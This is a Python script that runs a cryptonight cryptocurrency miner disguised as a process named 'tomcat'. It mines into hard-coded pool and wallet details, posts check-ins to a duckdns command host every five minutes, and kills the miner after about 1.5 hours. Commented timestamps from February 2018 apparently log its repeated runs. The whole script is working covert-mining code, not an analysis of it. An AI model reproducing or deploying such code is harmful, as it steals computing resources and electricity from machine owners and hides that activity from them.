import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:01.836431
#2018-02-17 17:17:04.940033
#2018-02-17 19:05:01.791036
#2018-02-17 20:52:06.128850
#2018-02-17 22:39:07.353235
#2018-02-18 00:23:05.142824
#2018-02-18 02:14:01.372981
#2018-02-18 04:00:09.270210
#2018-02-18 05:51:04.135188
#2018-02-18 07:42:06.259566
#2018-02-18 09:29:01.648224
#2018-02-18 11:16:01.623844
#2018-02-18 13:02:07.677997
#2018-02-18 14:51:01.711702
#2018-02-18 16:38:06.800275
#2018-02-18 18:27:03.856754
#2018-02-18 20:14:04.791010
#2018-02-18 22:00:10.067033
#2018-02-18 23:49:01.812536
#2018-02-19 01:35:05.381001
#2018-02-19 03:23:03.335901
#2018-02-19 05:08:05.486166
#2018-02-19 06:54:05.962605
#2018-02-19 08:42:05.240076
#2018-02-19 10:31:05.484140
#2018-02-19 12:19:07.112363
#2018-02-19 14:06:01.437290
#2018-02-19 15:54:09.939357
#2018-02-19 17:43:06.217460
#2018-02-19 19:31:07.866437
#2018-02-19 21:18:07.819259
#2018-02-19 23:03:06.629194
#2018-02-20 00:46:05.314227
#2018-02-20 02:39:03.246522
#2018-02-20 04:28:01.995131
#2018-02-20 06:12:07.018527
#2018-02-20 07:57:06.242761
#2018-02-20 09:43:01.709167
#2018-02-20 11:27:04.658623
#2018-02-20 13:13:05.610181
#2018-02-20 14:58:05.403142
#2018-02-20 16:42:02.127888
#2018-02-20 18:27:08.559944
#2018-02-20 20:18:01.573653
#2018-02-20 22:02:08.234131
#2018-02-20 23:43:03.956588
#2018-02-21 01:27:03.487798
#2018-02-21 03:15:06.990288
#2018-02-21 05:04:07.014484
#2018-02-21 06:51:04.971828
#2018-02-21 08:37:04.435707
#2018-02-21 10:23:07.606155
#2018-02-21 12:11:08.463541
#2018-02-21 13:59:07.417416
#2018-02-21 15:43:04.549404
#2018-02-21 17:34:07.208070
#2018-02-21 19:21:08.375444
#2018-02-21 21:10:10.115890
#2018-02-21 22:57:01.476957
#2018-02-22 00:47:05.243596
#2018-02-22 02:36:01.912990
#2018-02-22 04:21:06.072248
#2018-02-22 06:08:06.675528
#2018-02-22 07:53:04.739407
#2018-02-22 09:42:01.925838
#2018-02-22 11:27:07.523352
#2018-02-22 13:12:10.899512
#2018-02-22 15:03:08.548102
#2018-02-22 16:46:04.502606
#2018-02-22 18:32:06.296186
#2018-02-22 20:26:04.193610
#2018-02-22 22:11:08.008020
#2018-02-22 23:57:08.583833
#2018-02-23 01:47:02.189010
#2018-02-23 03:32:05.465268
#2018-02-23 05:17:01.975984
#2018-02-23 07:03:05.484855
#2018-02-23 08:51:01.891170
#2018-02-23 11:07:07.996942
#2018-02-23 13:00:06.144816
#2018-02-23 14:44:01.280692
#2018-02-23 16:33:01.216593
#2018-02-23 18:21:04.745722
#2018-02-23 20:05:07.270550
#2018-02-23 21:54:01.477672
#2018-02-23 23:43:06.747576
#2018-02-24 01:36:07.419363
#2018-02-24 03:24:06.940907
#2018-02-24 05:09:03.750604
#2018-02-24 06:57:05.870167
#2018-02-24 08:47:06.927838
#2018-02-24 10:50:05.464037
#2018-02-24 12:37:01.859259
#2018-02-24 14:25:02.135137
#2018-02-24 16:13:04.622223
#2018-02-24 18:06:07.084647
#2018-02-24 19:52:05.237650
#2018-02-24 21:37:06.463278
#2018-02-25 00:26:05.855762
#2018-02-25 04:16:04.690449
#2018-02-25 07:46:03.939409